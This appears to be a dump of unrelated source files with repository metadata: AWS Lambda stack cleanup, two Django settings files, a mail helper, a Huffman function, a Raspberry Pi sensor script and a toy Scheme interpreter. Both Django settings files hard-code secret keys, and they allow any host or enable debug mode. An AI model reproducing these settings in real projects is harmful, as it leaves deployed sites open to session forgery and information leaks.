Name = os.environ['STACK_NAME']
)
stack_value = stack_response['Parameter']['Value']
response = cfn_client.describe_stacks()
for stack in response['Stacks']:
if 'ROLLBACK_COMPLETE' in stack['StackStatus']:
logger.info('ERROR '+str(stack))
if stack['StackName'] == stack_value:
updated = table.update_item(
Key = {
'pk': 'AMAZON#',
'sk': 'AMAZON#'+ami_value
},
UpdateExpression = 'set running = :r',
ExpressionAttributeValues = {
':r': 'ERROR',
},
ReturnValues = 'UPDATED_NEW'
)
response = cfn_client.delete_stack(
StackName = stack_value,
RoleARN = deploy_value
)
response = parameter.put_parameter(
Name = os.environ['AMI_ID'],
Description = 'AMI Pipeline Image Id',
Value = os.environ['VALIDTEST'],
Overwrite = True
)
response = parameter.put_parameter(
Name = os.environ['INSTANCE_TYPE'],
Description = 'AMI Pipeline Instance Type',
Value = 'EMPTY',
Overwrite = True
)
response = parameter.put_parameter(
Name = os.environ['ARCH_TYPE'],
Description = 'AMI Pipeline Instance Type',
Value = 'EMPTY',
Overwrite = True
)
ec2_client = boto3.client('ec2')
response = ec2_client.describe_instances(
Filters=[
{
'Name': 'instance-state-name',
'Values': [
'running',
],
'Name': 'image-id',
'Values': [
ami_value,
]
}
]
)
ec2status = parameter.get_connection_status(
Target = response['Reservations'][0]['Instances'][0]['InstanceId']
)
if ec2status['Status'] == 'notconnected':
updated = table.update_item(
Key = {
'pk': 'AMAZON#',
'sk': 'AMAZON#'+ami_value
},
UpdateExpression = 'set running = :r',
ExpressionAttributeValues = {
':r': 'ERROR',
},
ReturnValues = 'UPDATED_NEW'
)
response = cfn_client.delete_stack(
StackName = stack_value,
RoleARN = deploy_value
)
response = parameter.put_parameter(
Name = os.environ['AMI_ID'],
Description = 'AMI Pipeline Image Id',
Value = os.environ['VALIDTEST'],
Overwrite = True
)
response = parameter.put_parameter(
Name = os.environ['INSTANCE_TYPE'],
Description = 'AMI Pipeline Instance Type',
Value = 'EMPTY',
Overwrite = True
)
response = parameter.put_parameter(
Name = os.environ['ARCH_TYPE'],
Description = 'AMI Pipeline Instance Type',
Value = 'EMPTY',
Overwrite = True
)
return {
'statusCode': 200,
'body': json.dumps('Launch Amazon Linux AMI')
} | [
"84751182+jblukach@users.noreply.github.com"
] | 84751182+jblukach@users.noreply.github.com |
b20e6db9ec4eac90633fcf7179a14e44c6974727 | a06918243fe887867d226ae28c341f7cd8728677 | /config/settings.py | bad81065ce1aa45e06c0f457e95279dc5df791d1 | [] | no_license | z1song/django_project | 97cb4b1cd2978ce7af196027e88cc19e8f190dc7 | 16476dfa5b36141206f78cefd0c76fbcda5693f0 | refs/heads/master | 2023-02-02T13:52:13.008003 | 2020-12-20T12:52:12 | 2020-12-20T12:52:12 | 319,083,226 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,330 | py | """
Django settings for config project.
Generated by 'django-admin startproject' using Django 2.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'bfsnb+arscyz%g3hoy%rh$*%q@=e_mp=w^w61awk1ia+xvvf(m'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'home',
'polls',
'bookmark',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, "templates")],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
| [
"wcn07102@naver.com"
] | wcn07102@naver.com |
9005faf81f6743fc7239e96b95cffe85cde7e46d | 72985bbc5bfc4126340eef54c7446b97e6e8d0fd | /orangejuice/utils/orangemail.py | c5845aef1311be2b759034b8add22c6798fc79f9 | [] | no_license | Larryrun80/OrangePlus | c3d09783b80ac356c6008dcfaa5e695b41be076b | 6079d68d9011195eaae1b95cc38db11d0b3e2c69 | refs/heads/master | 2021-01-21T13:11:13.694958 | 2015-07-31T09:23:04 | 2015-07-31T09:23:04 | 26,968,014 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,096 | py | #!/usr/bin/env python
#Filename: orangejuice/utils/orangemailer.py
import configparser
import os
import smtplib
import email.utils
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
class OrangeMail:
''' This Class is To Simplify Send Mail matters. '''
def __init__(self, section_name):
# Read config file and init mail settings
self._config_file = os.path.split(os.path.dirname(__file__))[0]
self._config_file += '/conf/orangejuice.conf'
config = configparser.ConfigParser()
config.read(self._config_file)
self.smtp = smtplib.SMTP(config.get(section_name, 'SMTP'))
self.smtp.login(config.get(section_name, 'User'),
config.get(section_name, 'Password'))
self.send_from = config.get(section_name, 'User')
def send_mail(self, send_to, subject, text, files=None):
# Check input data format
if files and not isinstance(files, list):
raise RuntimeError('Invalid Files, Should Pass a List!')
if not isinstance(send_to, list):
raise RuntimeError('Invalid Send_To Info, Should Pass a List!')
# Build Mail info
msg = MIMEMultipart()
msg['From'] = self.send_from
msg['To'] = email.utils.COMMASPACE.join(send_to)
msg['Subject'] = subject
msg.attach(MIMEText(text))
# Attach files to mail if a filename list passed
if files:
for file in files:
attachment = MIMEBase('application', 'octet-stream')
attachment.set_payload(open(file, "rb").read())
encoders.encode_base64(attachment)
attachment.add_header('Content-Disposition',
'attachment',
filename=os.path.split(file)[1])
msg.attach(attachment)
# Send mail and quit
self.smtp.send_message(msg)
self.smtp.quit()
# TODO: Dealing Exceptions
| [
"larryrun80@gmail.com"
] | larryrun80@gmail.com |
7bc495af7d3700fb9a3e374f33be587cd2222125 | 0de8086cea7e23af2a37211f248f4aee129322f3 | /untitled3.py | 932e7547edebdd8176d21c5bbf5ac793b4e8ac17 | [] | no_license | xinbotian/Huffman-encoding | 0ca38b6fd8e2953468220947507dc15439b8fb90 | 435356ca1f550e7b6bff6a172ada6f11d82c11c4 | refs/heads/master | 2021-05-07T20:02:18.474070 | 2017-10-31T03:37:17 | 2017-10-31T03:37:17 | 108,940,195 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | def avg_length(tree, freq_dict):
""" Return the number of bits per symbol required to compress text
made of the symbols and frequencies in freq_dict, using the Huffman tree.
@param HuffmanNode tree: a Huffman tree rooted at node 'tree'
@param dict(int,int) freq_dict: frequency dictionary
@rtype: float
>>> freq = {'a': 2, 'b': 7, 'c': 1}
>>> left = HuffmanNode(None, HuffmanNode('a'), HuffmanNode('b'))
>>> right = HuffmanNode('c')
>>> tree = HuffmanNode(None, left, right)
>>> avg_length(tree, freq)
1.9
"""
sum_frequencies = sum(list(freq_dict.values()))
sum_bits = []
codes = get_codes(tree)
len_codes = [len(codes[k]) for k in codes]
freq_list = [freq_dict[k] for k in freq_dict]
for i in range(len(len_codes)):
sum_bits.append(len_codes[i] * freq_list[i])
return sum(sum_bits) / sum_frequencies
| [
"xinbo.tian@mail.utoronto.ca"
] | xinbo.tian@mail.utoronto.ca |
005f638d6130c9043c19036ceb805b865dcb3fe6 | 8d96dd3abef64eebdcfdd1b6cf508275d63e8caf | /serverTest.py | b3807afca1e09a826227a14b3bb68cc332aabbae | [] | no_license | arcosin/ANP_ProcNode | dcd7b04435827f66dc985557b8e3510f7c412b6b | ca7af8677bc5a4787b8df39824b556fb19a6387d | refs/heads/master | 2023-04-14T14:26:41.835884 | 2021-04-20T06:08:04 | 2021-04-20T06:08:04 | 339,306,146 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | import client , server
def main():
print("start")
portno = 61619
name = "Naruto.jpg"
id = "Server"
s1 = server.Server( portno , name , id)
s1.createProxy()
s1.start()
if __name__ == '__main__':
main() | [
"VardhanAditya123@github.com"
] | VardhanAditya123@github.com |
15e51efc95ece00ddf71f40f02725436fbf5c154 | f29d67589d29844abd82176e2ba9e4514fde40f0 | /0109_light/src/RaspberryPI/light.py | 0a3ecc44d32e5b402dc6e8549d35e0e6e47d1b36 | [] | no_license | FaBoPlatform/FaBo | b92315e61226f020d1e6409387fc35fa3b255eb5 | f0a26d2747e5dbf67cb1311c6d9ac06bbc981a64 | refs/heads/master | 2023-09-01T06:41:43.500410 | 2023-08-30T08:47:49 | 2023-08-30T08:47:49 | 28,205,523 | 33 | 6 | null | 2021-02-22T06:16:08 | 2014-12-18T23:06:39 | Objective-C | UTF-8 | Python | false | false | 1,124 | py | #!/usr/bin/env python
# coding: utf-8
#
# FaBo Brick Sample
#
# #109 Light Brick
#
# A0コネクタにLightを接続して、GPIO4コネクタに接続したLED Brickの明るさ調節に使用しています。
import RPi.GPIO as GPIO
import spidev
import time
import sys
# A0コネクタにLightを接続
LIGHTPIN = 0
# GPIO4コネクタにLEDを接続
LEDPIN = 4
# GPIOポートを設定
GPIO.setwarnings(False)
GPIO.setmode( GPIO.BCM )
GPIO.setup( LEDPIN, GPIO.OUT )
# PWM/100Hzに設定
LED = GPIO.PWM(LEDPIN, 100)
# 初期化
LED.start(0)
spi = spidev.SpiDev()
spi.open(0,0)
def readadc(channel):
adc = spi.xfer2([1,(8+channel)<<4,0])
data = ((adc[1]&3) << 8) + adc[2]
return data
def arduino_map(x, in_min, in_max, out_min, out_max):
return (x - in_min) * (out_max - out_min) // (in_max - in_min) + out_min
if __name__ == '__main__':
try:
while True:
data = readadc(LIGHTPIN)
print("adc : {:8} ".format(data))
value = arduino_map(data, 0, 1023, 0, 100)
LED.ChangeDutyCycle(value)
time.sleep( 0.01 )
except KeyboardInterrupt:
LED.stop()
GPIO.cleanup()
spi.close()
sys.exit(0)
| [
"hideki.yamauchi@gmail.com"
] | hideki.yamauchi@gmail.com |
ed729caf1ecd7de60eb6f11108f66492b349a339 | b9d4045527d5ac750bc9d1ebe4dbfd50320a66fc | /mysite/settings.py | 156b2bf7c724934ec03a360f984c649044f087b0 | [] | no_license | ninalittorin/my-first-blog | 18eaffeb5258ae8b9db20205954725c83a3f9ad0 | e719c18310c0b975ab433e5608aca07c85cfa54c | refs/heads/master | 2020-04-17T11:20:47.953704 | 2019-01-19T14:13:45 | 2019-01-19T14:13:45 | 166,536,914 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,196 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.0.10.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+n-&!ljdf1uwy+co#%*1jpt($r-#o@@8*n6!k@+$gz1rb$m_-g'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1','.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Stockholm'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"ninalittorin@gmail.com"
] | ninalittorin@gmail.com |
0e9d848536ac21073907a772967755033d617ca8 | 65c5ca0db75f56118de52494bbcce68a6fea0f66 | /hw07_CuteInterpreter.py | a058ef6b1cffa69f05c8402b0598f852b2b17e69 | [] | no_license | ohheebin/PL_24-Cute_Interperter | 69115a7e1313e02262c85c42f53cd67c4aaff5aa | b14174f0eaf448fa730cac0fc6eaaf63566698bc | refs/heads/master | 2020-05-29T11:42:01.758177 | 2016-05-29T15:51:08 | 2016-05-29T15:51:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,158 | py | # -*- coding: utf-8 -*-
from string import letters, digits
class CuteType:
INT=1
ID=4
MINUS=2
PLUS=3
L_PAREN=5
R_PAREN=6
TRUE=8
FALSE=9
TIMES=10
DIV=11
LT=12
GT=13
EQ=14
APOSTROPHE=15
DEFINE=20
LAMBDA=21
COND=22
QUOTE=23
NOT=24
CAR=25
CDR=26
CONS=27
ATOM_Q=28
NULL_Q=29
EQ_Q=30
KEYWORD_LIST=('define', 'lambda', 'cond','quote', 'not', 'car', 'cdr', 'cons', 'atom?', 'null?', 'eq?' )
BINARYOP_LIST=(DIV, TIMES, MINUS, PLUS, LT, GT, EQ)
BOOLEAN_LIST=(TRUE, FALSE)
def check_keyword(token):
"""
:type token:str
:param token:
:return:
"""
if token.lower() in CuteType.KEYWORD_LIST:
return True
return False
def is_type_keyword(token):
if 20 <= token.type <= 30 :
return True
return False
def _get_keyword_type(token):
return {
'define':CuteType.DEFINE,
'lambda':CuteType.LAMBDA,
'cond':CuteType.COND,
'quote':CuteType.QUOTE,
'not':CuteType.NOT,
'car':CuteType.CAR,
'cdr':CuteType.CDR,
'cons':CuteType.CONS,
'atom?':CuteType.ATOM_Q,
'null?':CuteType.NULL_Q,
'eq?':CuteType.EQ_Q
}[token]
CUTETYPE_NAMES=dict((eval(attr, globals(), CuteType.__dict__), attr) for attr in dir(CuteType()) if not callable(attr) and not attr.startswith("__"))
def is_type_binaryOp(token):
"""
:type token:Token
:param token:
:return:
"""
if token.type in CuteType.BINARYOP_LIST:
return True
return False
def is_type_boolean(token):
"""
:type token:Token
:param token:
:return:
"""
if token.type in CuteType.BOOLEAN_LIST:
return True
return False
class Token(object):
def __init__(self, type, lexeme):
"""
:type type:CuteType
:type lexeme: str
:param type:
:param lexeme:
:return:
"""
self.type=type
self.lexeme=lexeme
#print type
def __str__(self):
#return self.lexeme
if self is None: return None
return "[" + CUTETYPE_NAMES[self.type] + ": " + self.lexeme + "]"
def __repr__(self):
return str(self)
class CuteScanner(object):
"""
:type token_iter:iter
"""
transM={}
def __init__(self, source):
"""
:type source:str
:param source:
:return:
"""
source=source.strip()
token_list=source.split(" ")
self.token_iter=iter(token_list)
def get_state(self, old_state, trans_char):
if trans_char in digits+letters+'?':
return {
0: {k: 1 if k in digits else 4 for k in digits+letters},
1: {k: 1 for k in digits},
2: {k: 1 for k in digits},
3: {k: 1 for k in digits},
4: {k: 4 if k is not '?' else 16 for k in digits+letters+'?'},
7: {k: 8 if k is 'T' else 9 for k in ['T', 'F']}
}[old_state][trans_char]
if old_state is 0:
return {
'(': 5, ')': 6,
'+': 3, '-': 2,
'*': 10, '/': 11,
'<': 12, '=': 14,
'>': 13, "'": 15,
'#': 7
}[trans_char]
def next_token(self):
state_old=0
temp_token=next(self.token_iter, None)
""":type :str"""
if temp_token is None : return None
for temp_char in temp_token:
state_old=self.get_state(state_old, temp_char)
if check_keyword(temp_token):
result = Token(_get_keyword_type(temp_token), temp_token)
else:
result=Token(state_old, temp_token)
return result
def tokenize(self):
tokens=[]
while True:
t=self.next_token()
if t is None :break
tokens.append(t)
return tokens
class TokenType():
INT=1
ID=4
MINUS=2
PLUS=3
LIST=5
TRUE=8
FALSE=9
TIMES=10
DIV=11
LT=12
GT=13
EQ=14
APOSTROPHE=15
DEFINE=20
LAMBDA=21
COND=22
QUOTE=23
NOT=24
CAR=25
CDR=26
CONS=27
ATOM_Q=28
NULL_Q=29
EQ_Q=30
NODETYPE_NAMES = dict((eval(attr, globals(), TokenType.__dict__), attr) for attr in dir(TokenType()) if not callable(attr) and not attr.startswith("__"))
class Node (object):
def __init__(self, type, value=None):
self.next = None
self.value = value
self.type = type
def set_last_next(self, next_node):
if self.next is not None:
self.next.set_last_next(next_node)
else : self.next=next_node
def get_tail(self):
def get_list_tail(node):
"""
:type node: Node
"""
if node.type is TokenType.LIST:
return get_list_tail(node.value)
else:
if node.next is None:
return node
return get_list_tail(node.next)
if self.type is TokenType.LIST:
return get_list_tail(self)
return self
def __str__(self):
result = ""
if self.type is TokenType.ID:
result = "["+self.value+"]"
elif self.type is TokenType.INT:
result = str(self.value)
elif self.type is TokenType.LIST:
if self.value is not None and self.value.type is TokenType.QUOTE:
result = str(self.value)
else:
result = "("+str(self.value)+")"
elif self.type is TokenType.QUOTE:
result = "'"
else:
result = "["+NODETYPE_NAMES[self.type]+"]"
if self.next is None:
return result
else: return result+" "+str(self.next)
class BasicPaser(object):
def __init__(self, token_list):
"""
:type token_list:list
:param token_list:
:return:
"""
self.token_iter=iter(token_list)
def _get_next_token(self):
"""
:rtype: Token
:return:
"""
next_token=next(self.token_iter, None)
if next_token is None: return None
return next_token
def parse_expr(self):
"""
:rtype : Node
:return:
"""
token =self._get_next_token()
""":type :Token"""
if token==None: return None
result = self._create_node(token)
return result
def _create_node(self, token):
if token is None: return None
if token.type is CuteType.INT: return Node(TokenType.INT, token.lexeme)
elif token.type is CuteType.ID: return Node(TokenType.ID, token.lexeme)
elif token.type is CuteType.L_PAREN: return Node(TokenType.LIST, self._parse_expr_list())
elif token.type is CuteType.R_PAREN: return None
elif token.type is CuteType.APOSTROPHE:
q_node = Node(TokenType.QUOTE)
q_node.next=self.parse_expr()
new_list_node = Node(TokenType.LIST, q_node)
return new_list_node
elif token.type is CuteType.QUOTE:
q_node = Node(TokenType.QUOTE)
return q_node
elif is_type_binaryOp(token) or \
is_type_keyword(token) or \
is_type_boolean(token):
return Node(token.type)
else:
return None
def _parse_expr_list(self):
head = self.parse_expr()
""":type :Node"""
if head is not None:
head.next = self._parse_expr_list()
return head
class CuteInterpreter(object):
TRUE_NODE = Node(TokenType.TRUE)
FALSE_NODE = Node(TokenType.FALSE)
def run_arith(self, arith_node):
rhs1 = arith_node.next
rhs2 = rhs1.next if rhs1.next is not None else None
left = self.run_expr(rhs1)
right = self.run_expr(rhs2)
result = Node(TokenType.INT)
if arith_node.type is TokenType.PLUS:
result.value = int(left.value) + int(right.value)
elif arith_node.type is TokenType.MINUS:
result.value = int(left.value) - int(right.value)
elif arith_node.type is TokenType.TIMES:
result.value = int(left.value) * int(right.value)
elif arith_node.type is TokenType.DIV:
result.value = int(left.value) / int(right.value)
return result
def run_func(self, func_node):
rhs1 = func_node.next
rhs2 = rhs1.next if rhs1.next is not None else None
def create_quote_node(node, list_flag = False):
"""
"Quote 노드를 생성한 뒤, node를 next로 하여 반환"
"list_flag가 True일 경우, list node를 생성한 뒤, list의 value를 입력받은 node로 연결하고"
"Quote의 next를 여기서 생상한 list로 연결함"
"최종 리턴은 여기서 생성한 quote노드를 value로 갖는 List"
"""
q_node = Node(TokenType.QUOTE)
if list_flag:
inner_l_node = Node(TokenType.LIST, node)
q_node.next = inner_l_node
else:
q_node.next = node
l_node = Node(TokenType.LIST, q_node)
return l_node
def is_quote_list(node):
"Quote의 next가 list인지 확인"
if node.type is TokenType.LIST:
if node.value.type is TokenType.QUOTE:
if node.value.next.type is TokenType.LIST:
return True
return False
def pop_node_from_quote_list(node):
"Quote list에서 quote에 연결되어 있는 list노드의 value를 꺼내줌"
if not is_quote_list(node):
return node
return node.value.next.value
def list_is_null(node):
"입력받은 node가 null list인지 확인함"
node = pop_node_from_quote_list(node)
if node is None:return True
return False
if func_node.type is TokenType.CAR:
rhs1 = self.run_expr(rhs1)
if not is_quote_list(rhs1):
print ("car error!")
result = pop_node_from_quote_list(rhs1)
if result.type is not TokenType.LIST:
return result
return create_quote_node(result)
elif func_node.type is TokenType.CDR:
rhs1 = self.run_expr(rhs1)
if not is_quote_list(rhs1):
print("cdr error!")
result = pop_node_from_quote_list(rhs1)
q_node = Node(TokenType.LIST, result.next)
return create_quote_node(q_node)
elif func_node.type is TokenType.CONS:
expr_rhs1 = self.run_expr(rhs1)
expr_rhs2 = self.run_expr(rhs2)
if is_quote_list(expr_rhs1):
head = Node(TokenType.LIST, pop_node_from_quote_list(expr_rhs1))
else:
head = pop_node_from_quote_list(expr_rhs1)
head.next = pop_node_from_quote_list(expr_rhs2)
q_node = Node(TokenType.LIST, head)
return create_quote_node(q_node)
elif func_node.type is TokenType.ATOM_Q:
if list_is_null(rhs1): return self.TRUE_NODE
if rhs1.type is not TokenType.LIST: return self.TRUE_NODE
if rhs1.type is TokenType.LIST:
if rhs1.value.type is TokenType.QUOTE:
if rhs1.value.next is not TokenType.LIST:
return self.TRUE_NODE
return self.FALSE_NODE
elif func_node.type is TokenType.EQ_Q:
if rhs1.type is TokenType.INT:
if rhs1.value is rhs2.value:
return self.TRUE_NODE
return self.FALSE_NODE
elif func_node.type is TokenType.NULL_Q:
if list_is_null(rhs1): return self.TRUE_NODE
return self.FALSE_NODE
elif func_node.type is TokenType.GT:
expr_rhs1 = self.run_expr(rhs1)
expr_rhs2 = self.run_expr(rhs2)
if int(expr_rhs1.value) > int(expr_rhs2.value):
return self.TRUE_NODE
else:
return self.FALSE_NODE
elif func_node.type is TokenType.LT:
expr_rhs1 = self.run_expr(rhs1)
expr_rhs2 = self.run_expr(rhs2)
if int(expr_rhs1.value) < int(expr_rhs2.value):
return self.TRUE_NODE
else:
return self.FALSE_NODE
elif func_node.type is TokenType.EQ:
expr_rhs1 = self.run_expr(rhs1)
expr_rhs2 = self.run_expr(rhs2)
if int(expr_rhs1.value) == int(expr_rhs2.value):
return self.TRUE_NODE
else:
return self.FALSE_NODE
elif func_node.type is TokenType.NOT:
expr_rhs1 = self.run_expr(rhs1)
if str(expr_rhs1) == str(self.FALSE_NODE):
return self.TRUE_NODE
elif str(expr_rhs1) == str(self.TRUE_NODE):
return self.FALSE_NODE
elif func_node.type is TokenType.COND:
while rhs1 is not None:
condition = rhs1.value
result = condition.next
if self.run_expr(condition).type is TokenType.TRUE:
return self.run_expr(result)
else:
rhs1 = rhs1.next
return None
else:
return None
def run_expr(self, root_node):
"""
:type root_node: Node
"""
if root_node is None:
return None
if root_node.type is TokenType.ID:
return root_node
elif root_node.type is TokenType.INT:
return root_node
elif root_node.type is TokenType.TRUE:
return root_node
elif root_node.type is TokenType.FALSE:
return root_node
elif root_node.type is TokenType.LIST:
return self.run_list(root_node)
else:
print "Run Expr Error"
return None
def run_list(self, l_node):
"""
:type l_node:Node
"""
op_code = l_node.value
if op_code is None:
return l_node
if op_code.type in \
[TokenType.CAR, TokenType.CDR, TokenType.CONS, TokenType.ATOM_Q,\
TokenType.EQ_Q, TokenType.NULL_Q, TokenType.NOT, \
TokenType.GT, TokenType.LT, TokenType.EQ, TokenType.COND]:
return self.run_func(op_code)
if op_code.type in \
[TokenType.PLUS, TokenType.MINUS, TokenType.TIMES, \
TokenType.DIV]:
return self.run_arith(op_code)
if op_code.type is TokenType.QUOTE:
return l_node
else:
print "application: not a procedure;"
print "expected a procedure that can be applied to arguments"
print "Token Type is "+ op_code.value
return None
def print_node(node):
"""
"Evaluation 후 결과를 출력하기 위한 함수"
"입력은 List Node 또는 atom"
:type node: Node
"""
def print_list(node):
"""
"List노드의 value에 대해서 출력"
"( 2 3 )이 입력이면 2와 3에 대해서 모두 출력함"
:type node: Node
"""
def print_list_val(node):
if node.next is not None:
return print_node(node)+" "+print_list_val(node.next)
return print_node(node)
if node.type is TokenType.LIST:
if node.value.type is TokenType.QUOTE:
return print_node(node.value)
return "("+print_list_val(node.value)+")"
if node is None:
return ""
if node.type in [TokenType.ID, TokenType.INT]:
return node.value
if node.type is TokenType.TRUE:
return "#T"
if node.type is TokenType.FALSE:
return "#F"
if node.type is TokenType.PLUS:
return "+"
if node.type is TokenType.MINUS:
return "-"
if node.type is TokenType.TIMES:
return "*"
if node.type is TokenType.DIV:
return "/"
if node.type is TokenType.GT:
return ">"
if node.type is TokenType.LT:
return "<"
if node.type is TokenType.EQ:
return "="
if node.type is TokenType.LIST:
return print_list(node)
if node.type is TokenType.ATOM_Q:
return "atom?"
if node.type is TokenType.CAR:
return "car"
if node.type is TokenType.CDR:
return "cdr"
if node.type is TokenType.COND:
return "cond"
if node.type is TokenType.CONS:
return "cons"
if node.type is TokenType.LAMBDA:
return "lambda"
if node.type is TokenType.NULL_Q:
return "null?"
if node.type is TokenType.EQ_Q:
return "eq?"
if node.type is TokenType.NOT:
return "not"
if node.type is TokenType.QUOTE:
return "'"+print_node(node.next)
def Test_method(input):
test_cute = CuteScanner(input)
test_tokens=test_cute.tokenize()
test_basic_paser = BasicPaser(test_tokens)
node = test_basic_paser.parse_expr()
cute_inter = CuteInterpreter()
result = cute_inter.run_expr(node)
print "... ",
print print_node(result)
def Test_All():
while 1:
test_inter = raw_input("> ")
Test_method(test_inter)
Test_All()
| [
"geniusry@naver.com"
] | geniusry@naver.com |
cd47f62822b1151340a50de2d7fbd3314f87f456 | 23b7798eba392235ef0adc62869e4e27736f7749 | /src/restaurant_researcher/wsgi.py | 4210d0ac5fc17e03c973ba747e898de27a634be0 | [] | no_license | kathryn0908/restaurant_api | f802072077c2c4e7b81dba5b95482888d5c1cbe9 | 215e3112e9b47577b440e5f1e3d28423cad177f6 | refs/heads/master | 2022-11-30T02:01:30.809491 | 2020-08-05T16:36:15 | 2020-08-05T16:36:15 | 274,771,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | """
WSGI config for restaurant_researcher project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'restaurant_researcher.settings')
application = get_wsgi_application()
| [
"kathrynlael@gmail.com"
] | kathrynlael@gmail.com |
